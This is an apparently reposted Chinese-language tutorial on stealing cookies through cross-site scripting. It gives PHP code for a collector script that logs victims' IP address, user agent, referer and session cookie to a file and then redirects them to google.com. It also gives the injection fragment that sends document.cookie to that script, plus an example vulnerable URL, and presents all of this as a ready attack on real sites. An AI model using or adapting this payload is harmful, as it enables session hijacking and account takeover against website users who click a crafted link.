利用xss偷cookie教學

author:pentest

譯:[hiphop]

收集:X.DW

使用的工具：

1.免费网页支援PHP

2.存在xss的脆弱的网站。

vb.php为存放cookie的网页

PHP Code:

COOKIES STEALTHER

By R00T[ATI]

 

 

documents.php取得cookie的网页

PHP Code:

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date("Y-m-d G:i:s A");
$text = "

".$time." = ".$ip."

User Agent: ".$agent."
Referer: ".$referer."
Session: ".$data."


";

$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: http://www.google.com");

?>

Vb.php文件是用来收集Cookie和其他信息。

documents.php文件用于抓取资料如： IP地址，用户代理和cookie 。

现在，我们需要找到脆弱网站跨站点脚本（ XSS ） 。在这之后插入一个脚本调用documents.php是抓住文件的Cookie使用的方法

documents.php?c="+document.cookie;
如下例子

:
Code:
http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=

当受害者点到这个连结时cookie就被偷走了会存放在vb.php里面

文章如转载，请注明转载自【网管小王的独立博客】：http://www.5iadmin.com/